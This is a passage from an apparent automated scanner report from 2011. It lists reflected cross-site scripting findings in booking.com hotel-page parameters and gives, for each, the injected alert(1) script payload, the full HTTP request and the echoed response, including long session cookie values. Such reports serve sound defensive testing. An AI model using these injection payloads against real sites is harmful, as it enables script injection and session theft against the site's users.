Q72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:14:39 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zIsOtbI9WtyhMLyE%2FQV%2FQTYiotzAvC9%2BdCHM75BMNs3mrrHPVgsIUgDIs4u8XFfeLk4jiI90swJSsvNlRDq7wypY5P37W7kmz6xzvrF3kMGzQwd24NucnZXKqFcgAzEPSENFO%2BPDG5e3BMZO5ke2Qkx24r8suLRNggmcfMQhCgb1FmPF25rNAeoc2nzWRqhOouVDQSICkIhuFjAr%2F1k8S0fbluUStTHfzqdnMW9lY3Di0NtlHwyjcpqETFzs8r1jWq3gXAXpc5o8f9%2F2DQiIb%2FG6ntjWcDl5yPrMm%2BebuEaiVGImDi9uZnok37OJnDV4yQqPG71fkXFLDvRl2OfyYKRZtc1cjbiMO93ggRFNYfSb7lX9oZNe72Qvj8tq6iA7CAFWCU6Xh2CwZvca5l7wY4W%2F2I4qgvr6ZgIhxzJ56QbsCoLtkLdGNqSmH%2FCSwYKdXDm9%2Bii6DBhkZLNjbCUW%2FW3blDTd33cuBDwKRU2rm9rpJA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:14:39 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224367
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
oston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10ed23e"><script>alert(1)</script>defc7b1fdf7&checkout_monthday=16&checkout_year_month=2011-10&lang=en">
...[SNIP]...

4.173. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkin_year_month parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkin_year_month request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da324</script><script>alert(1)</script>03dbfbc3f4c was submitted in the checkin_year_month parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. The HTML tokenizer ends a script element at the first </script> sequence it meets, regardless of the JavaScript quoting state, so escaping quotes and backslashes in the string literal does not stop the payload shown above from closing the script block and opening a new one. If at all possible, the application should avoid echoing user data within this context; where that is unavoidable, the value should be serialised so that <, > and & are emitted as JavaScript \uXXXX escapes and never reach the HTML tokenizer as literal characters.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10da324</script><script>alert(1)</script>03dbfbc3f4c&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:04 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YbKxbV%2FMJ74m327rSMm5c9JJEUOw2zQiSbjMQslasKIWsdewz%2F0VtJrS%2FBe3j2XL%2BYh4BDPO%2BDitbsFTdP%2BluEtiJQBcWAWgr4XDHiM8uwMW3un%2FWwmI4CSVSlaOkrLTHf%2FllikL9mVsc383Po26ey%2Fc0%2B2Hkw%2FYW76yELDlnscWvB50nxviHv839E%2BczuCHQKEsCc4Bo1VxY9jrvJI4eQ1AolBx2RM%2FAkETjClhI4XLH1ujvZJSUMkApk4hRuNGECvfhIc%2FSnwJCAyKSCHaFVSyK6T%2FVYP6ZX3rJ091HiMcq%2B624eqW2MhvUdS8yL5sb7qv4UTWITTKja2khJa%2FwvpvMkvnxs3CmrHQks9BfTH3FwutnBd1A6SWGnxW5V0wy349j1cB99T50gsjTvHOal87WkL4YdOwpehjb%2BQQAREgddobDCvgsDHYtvUZO0hW%2FxVubY44OUOoCKizCh25iZekU9khZq0aFUklNtvejis7bmtDRg1CK2o8jVo8H2Wit3sw5d%2FxGfiTGEGYZLbxNX3zvPxsV4xG%2FKgqh%2B0YIErwU53qNZQiNTY503KCjrl5Y5GGBbXSfY%2FEB3ogs0fPDA%2B45IrqX4ZRADOx1R%2BVQ%2F312tqH6NxXUnHy4%2BuihLsXqd5NKDi8Z41%2Fpv511Xpuvw%2BC%2BD8LqLPuTE3qRwo7wR%2FdDKo1Ih3A73RKaq752Ej74mdW%2BLSus3H9iM2mqKwbclvtUfDah8p9CtFyxMF4AIF%2BUXhKk6LyHP0kzpubR2nlTmbX6YrKcEHJHyDjwwGQeBxvO5ZItRX98AMj5J3nXFe2F8dfet%2FI%2B2HjgQhi2GYdVJZcH1NZlNjOk1cUj0ZzU2VpsRQimVIvotszp39YgKN%2F4kej5tZtVCMWc%2B%2BvMrw6PkNzavwZBE8%2FlxOf2FigIZIRFdNfd6%2BmH3JOU3PIimbYn08%2BvenTsLBbBJ3CyXGV6WK9%2BEeepI0hOW4VPOMNaQi6KqDKgQ%2BW9W7AyLBtB7LnlPXUQOlDbjJJvdHokYoARDjkXnF5ObLMb93Ebr1vZQ2MGrLX%2FNAQavDW8ipi93nyz00RUHEQrPqHRo96IJO2FL8W3AG4cbCR6gLsKhG0sNrgph5mVcgTH0kN6JU5R40OuMqEReSTrsQH7s8zwsN7aPjCL%2BTOTulBufBxgfodUA5cVhNV%2Bwy2OqQ3uaKzQvjpzCZy1dCqQFKAgwOHDEtM3GOLk0r%2F%2FuxfMcXLrIstgyafuaOasGyHHPRJiMAdVaTHBxMJFGnw6qROLOCrmN9J3BUI9eYvA7wc%2F4FIw5Ra88BHq1adM6G26uj7Q5ZnMX3JF%2Bj5ymt3ugBre1bo0OOn0stFqwEwBzCp5nAlBO8GkGoibIjti4slEA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:05 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 224386
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
oston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10da324</script><script>alert(1)</script>03dbfbc3f4c&checkout_monthday=16&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin_monthda
...[SNIP]...

4.174. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_monthday request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18d6b</script><script>alert(1)</script>36cc332c433 was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=1618d6b</script><script>alert(1)</script>36cc332c433&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:34 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oKSwaVgSzLZAeNg0584mKDvvOKCp7HpfjRBo0IyHEkQCqf9WwHZWwpHrZEhChd%2FbdruG1xEHomQ4WJbmVunk3B0joGNRrj7n%2BtwKivSLr0cPVRSK02E0uVtTsydSE9VK0UqmXLKjGCCnaPUKFJxDN1xHfEEtc7w6ss%2FY9lGr0ePJMwRHAJ77zFIZvSoZMPFaOoEvfieKqdt1jbyHCVB0n4cxO5jx49%2FvdPR6ISHIUXzUcrjFFM%2FmBnZiXcvvFLU8C3b8ECppcVj6iK4Tg20h4Nm7egjUCTXfUYdaUii97GWjoZlCQAD3n7VqfbCc6%2F%2FkRYNBtiSSPXotMFaiLTFF0a3BnLah0LSDawoZ6stNl6gbnwH0khoP94q%2Fllaar6%2FQBKXuAEjKt%2FbzRTPCWCfUPk5fDyApMRhMS%2BxCTEaiPctKlUT1FfHxV1XmmKt1loHtws%2By0Ia32RDhAYyhw0J4QG7OBjqKTrVfPCxS%2FSjiPB3eA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:35 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 230242
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=1618d6b</script><script>alert(1)</script>36cc332c433&checkout_year_month=2011-10&lang=en',
b_this_url : '/hotel/us/c-boston-massachusettes.en-us.html?aid=323804;label=hotel-59554;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin_monthday=14;checkin_year_mon
...[SNIP]...

4.175. http://www.booking.com/hotel/us/c-boston-massachusettes.html [checkout_monthday parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the checkout_monthday request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 175d4"><script>alert(1)</script>4d50fc21cb9 was submitted in the checkout_monthday parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16175d4"><script>alert(1)</script>4d50fc21cb9&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:15:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YWaiSgbFU5%2BGbFMKGxhLGxcV8JgVcsNPdwFrYE9stqnMmO6fnezme%2FSKovCgD%2FmghVroj8%2Fv94KVF6nxVdJXxbxsoyyUKiMxk%2BHqWhhgecDSoZbfT3IgB%2Bys5JhVUx09wv%2FCvqgNFA3NTgOGzPpI21kul0Km944LAkGjdCk98wlfQJBQIMubVfwwTOiRjuhNTdmO3Arzv5TP%2B554VEudje40Z8cfyqZ06Lc4QvCHW5ttNGQ%2BIad7noRujQlQVCKhyWKOE6Eo1n3N6aR6certxqGl38fEJzkQPbYn1qGOItUUm%2FOYEMIq%2FyMr4VDvz%2Be4RfapT9%2Bez%2BNVYQ%2Bdlv87DkdXvN%2BbnMOdMzpEXWhAH9qNjlZ71rvXXvJrfbGJg8Kro8dJq9Bx22pxeX5puEOANM7mDjSVTGQfv6cZg2iJpy66pGhA4c1tnsFtS1oVGn3Z%2BFIBA01R3VhaI60xAxg587Tf%2BBN0Nb832D9CwPqiPsrDAjr01J8Lhew%2FvLEiX9GCG9tszA3SXlesk3QQeA6gN2xThCdpUEcKKpn9wBASP6irw%2Bm0CcMtCp%2BZK%2FdgOEG%2Bq1vrdS2h2GMq9rTCdVsS6VpM8frDZq6fwhbw68G6LavMuIKDc6STqUtTh91C6oovmRh%2Fvgz6VpegApFBpvWwg7hyJohSQPigg1eoBT9awgqDlxbXiOf3pO9FGTVbsXbOp9fHXdgqbXpiu6rkEYMvK4%2FH5EpYBbC9NQjADPtg84ePxV5JFOlABqQbM37dsyNq5Xeif5YUQEOJplrOfb4QMvNShvWBMqrymM0f42gK4RHlnEXNz8n4dCp2yPQJuqtJ9nj36s2hlfkqQ2127YunPFfVi3HMuHp3FRc3%2BNrwCZY%2BuDZbufxU7RD7gBS9a6FhqrVGvSLK%2FpNMVkn5HJihS95nPo4XyathQybCEF0ebdjYN9FqqlTKvWHKNAIKLI10xOsbQYUIog6xuU6PChY3BqteIeVz1OLoCOWWy%2BcDRGw4u%2B6sV0EueG%2BZLO2CFc6Ez9emFaPDVlwv2cBRCKKzVIidd4G%2Fylg1EqJgEK73%2FlsSPlC35oKU4CWu5R80J4A7%2Fiw4t3xyJNfZMXHtxMeS3ICAsVChm%2BfU772CyNOmoD7GfITPvToYBlsV0fKobNFmVl68%2BomffDjEwVkPT2HYfjps%2BdMVovvVSejuqx%2FRjGuOlLB8GUwJ9rkU8CkgHGs06k%2FBFC8taHgkCkMOxmTo2pFi7QDIO9vk2AWX7JKRHRprGkW4FBeefwabpcwyipO56OMDVkYSE5OU9sSWiPXVcymY9QdMqQcMoJZ36nzJLDJgN8JH%2B5F4gje9nW8HeBz4chBAT9LuI9q45%2F5rvHx8FLo1J6zPo0y8%2Fw%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:15:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 230222
Content-Type: text/html; charset=UTF-8


